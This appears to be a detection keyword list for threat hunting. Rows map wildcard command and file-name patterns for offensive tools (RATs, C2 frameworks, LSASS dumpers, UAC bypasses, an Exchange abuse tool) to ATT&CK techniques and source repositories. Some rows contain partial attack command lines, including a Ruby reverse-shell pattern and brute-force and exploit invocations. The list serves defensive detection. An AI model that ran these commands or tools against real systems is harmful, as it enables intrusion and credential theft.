-*RubeusMonitorMenu*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*RubeusPttManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*RubeusPttMenu*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*RubeusPurgeManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z
-*RubeusPurgeMenu*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RubeusRenewManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RubeusRenewMenu*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RubeusS4UManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RubeusS4UMenu*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RubeusTgtDelegManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - 
TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RubeusTgtDelegMenu*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*RubeusTriageManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*ruby CVE-202*-*.rb *,offensive_tool_keyword,POC,CVE-2023-34362: MOVEit Transfer Unauthenticated RCE,T1190.001 - T1210.002 - T1068 - T1059.001 - T1059.003,TA0005 - TA0001 - TA0002 - TA0043,N/A,N/A,Exploitation tools,https://github.com/sfewer-r7/CVE-2023-34362,1,0,N/A,N/A,1,62,24,2023-06-13T08:46:03Z,2023-06-12T12:56:12Z -*ruby poc-cve-202*-*.rb*,offensive_tool_keyword,POC,CVE-2023-34362: MOVEit Transfer Unauthenticated RCE,T1190.001 - T1210.002 - T1068 - T1059.001 - T1059.003,TA0005 - TA0001 - TA0002 - TA0043,N/A,N/A,Exploitation tools,https://github.com/sfewer-r7/CVE-2023-34362,1,0,N/A,N/A,1,62,24,2023-06-13T08:46:03Z,2023-06-12T12:56:12Z -*ruby -rsocket *TCPSocket.open(*exec sprintf*/bin/sh -i *,greyware_tool_keyword,ruby,ruby reverse shell,T1071 - T1071.004 - T1021,TA0002 - TA0011,N/A,N/A,C2,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,10,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*ruby_nntpd_cmd_exec*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*ruby_no_sh_reverse_tcp.py*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*ruby_reverse_tcp.py*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*Rudrastra-main.zip*,offensive_tool_keyword,Rudrastra,Make a Fake wireless access point aka Evil Twin,T1491 - T1090.004 - T1557.001,TA0040 - TA0011 - TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/SxNade/Rudrastra,1,1,N/A,8,1,46,21,2023-04-22T15:10:42Z,2020-11-05T09:38:15Z -*ruler * abk dump -o *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*ruler -k -d * brute --users 
*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*ruler-linux64*,offensive_tool_keyword,ruler,A tool to abuse Exchange services,T1102.001 - T1201.001 - T1570.002,TA0006,N/A,N/A,Exploitation tools,https://github.com/sensepost/ruler,1,1,N/A,N/A,10,1991,353,2021-02-19T09:28:07Z,2016-08-18T15:05:13Z -*ruler-linux86*,offensive_tool_keyword,ruler,A tool to abuse Exchange services,T1102.001 - T1201.001 - T1570.002,TA0006,N/A,N/A,Exploitation tools,https://github.com/sensepost/ruler,1,1,N/A,N/A,10,1991,353,2021-02-19T09:28:07Z,2016-08-18T15:05:13Z -*ruler-osx64*,offensive_tool_keyword,ruler,A tool to abuse Exchange services,T1102.001 - T1201.001 - T1570.002,TA0006,N/A,N/A,Exploitation tools,https://github.com/sensepost/ruler,1,1,N/A,N/A,10,1991,353,2021-02-19T09:28:07Z,2016-08-18T15:05:13Z -*ruler-win64.exe*,offensive_tool_keyword,ruler,A tool to abuse Exchange services,T1102.001 - T1201.001 - T1570.002,TA0006,N/A,N/A,Exploitation tools,https://github.com/sensepost/ruler,1,1,N/A,N/A,10,1991,353,2021-02-19T09:28:07Z,2016-08-18T15:05:13Z -*ruler-win86.exe*,offensive_tool_keyword,ruler,A tool to abuse Exchange services,T1102.001 - T1201.001 - T1570.002,TA0006,N/A,N/A,Exploitation tools,https://github.com/sensepost/ruler,1,1,N/A,N/A,10,1991,353,2021-02-19T09:28:07Z,2016-08-18T15:05:13Z -*rules/d3ad0ne.rule*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*run * pyshell*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*run android_cam *,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*run --bg shell_exec*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*run -Executable *.exe*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*run interactive_shell*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*run keylogger*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*run memory_exec *.*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*run mouselogger*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*run post/windows/gather/checkvm*,offensive_tool_keyword,metasploit,Metasploit Callback Automation:Use AutoRunScript to run commands on a reverse shell callback,T1059 - T1064 - T1029,TA0002 - TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*run post/windows/manage/killfw*,offensive_tool_keyword,metasploit,Metasploit Callback Automation:Use AutoRunScript to run commands on a reverse shell callback,T1059 - T1064 - T1029,TA0002 - TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*run post/windows/manage/migrate*,offensive_tool_keyword,metasploit,Metasploit Callback Automation:Use AutoRunScript to run commands on a reverse shell callback,T1059 - T1064 - T1029,TA0002 - TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*run pyexec *,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*run shell_exec *,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*run shellcode_exec*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*Run the krbscm method for SYSTEM shell*,offensive_tool_keyword,S4UTomato,Escalate Service Account To LocalSystem via Kerberos,T1558 - T1558.002 - T1548.002 - T1078 - T1078.004,TA0006 - TA0004 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/wh0amitz/S4UTomato,1,0,N/A,10,4,315,58,2023-09-14T08:53:19Z,2023-07-30T11:51:57Z -*run thief:latest*,offensive_tool_keyword,SeeYouCM-Thief,Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials,T1110.001 - T1005 - T1071.001,TA0001 - TA0011 - TA0005,N/A,N/A,Discovery,https://github.com/trustedsec/SeeYouCM-Thief,1,0,N/A,9,2,149,30,2023-05-11T01:04:36Z,2022-01-14T20:12:25Z -*run_ppl_dump_exploit*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*run_ppl_medic_exploit*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*run_server.bat,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*runasadmin uac-cmstplua*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*runasadmin uac-token-duplication*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - 
T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*RunasCreateProcessAsUserW*,offensive_tool_keyword,RunasCs,RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential,T1055 - T1134.001,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs,1,0,N/A,N/A,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -*RunasCs.exe*,offensive_tool_keyword,RunasCs,RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential,T1055 - T1134.001,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs,1,1,N/A,N/A,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -*RunasCs.exe*,offensive_tool_keyword,RunasCs,RunasCs - Csharp and open version of windows builtin runas.exe,T1059.003 - T1059.001 - T1035,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs/,1,1,N/A,6,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z 
-*RunasCs.zip*,offensive_tool_keyword,RunasCs,RunasCs - Csharp and open version of windows builtin runas.exe,T1059.003 - T1059.001 - T1035,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs/,1,1,N/A,6,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -*RunasCs_net2.exe*,offensive_tool_keyword,RunasCs,RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential,T1055 - T1134.001,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs,1,1,N/A,N/A,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -*RunasCs_net2.exe*,offensive_tool_keyword,RunasCs,RunasCs - Csharp and open version of windows builtin runas.exe,T1059.003 - T1059.001 - T1035,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs/,1,1,N/A,6,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -*RunasCsMain*,offensive_tool_keyword,RunasCs,RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential,T1055 - T1134.001,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs,1,0,N/A,N/A,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -*RunasCs-master*,offensive_tool_keyword,RunasCs,RunasCs - Csharp and open version of windows builtin runas.exe,T1059.003 - T1059.001 - T1035,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs/,1,1,N/A,6,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -*runas-netonly *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - 
T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*runasppl_check*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*RunAsWinTcb.exe*,offensive_tool_keyword,RunAsWinTcb,RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.,T1073.002 - T1055.001 - T1055.002,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/tastypepperoni/RunAsWinTcb,1,1,N/A,10,2,119,16,2022-08-02T16:35:50Z,2022-07-29T16:36:06Z -*RunAsWinTcb-master*,offensive_tool_keyword,RunAsWinTcb,RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.,T1073.002 - T1055.001 - T1055.002,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/tastypepperoni/RunAsWinTcb,1,1,N/A,10,2,119,16,2022-08-02T16:35:50Z,2022-07-29T16:36:06Z -*RunCleanup-77740706-9DEC-EC11-BB3D-0022482CA4A7.json*,offensive_tool_keyword,power-pwn,An offensive and defensive security toolset for Microsoft 365 Power Platform,T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002,TA0003 - TA0004 - TA0005 - TA0001,N/A,N/A,Exploitation tools,https://github.com/mbrg/power-pwn,1,1,N/A,10,4,360,34,2023-09-12T12:44:44Z,2022-06-14T11:40:21Z -*RunCodeExec-75740706-9DEC-EC11-BB3D-0022482CA4A7.json*,offensive_tool_keyword,power-pwn,An 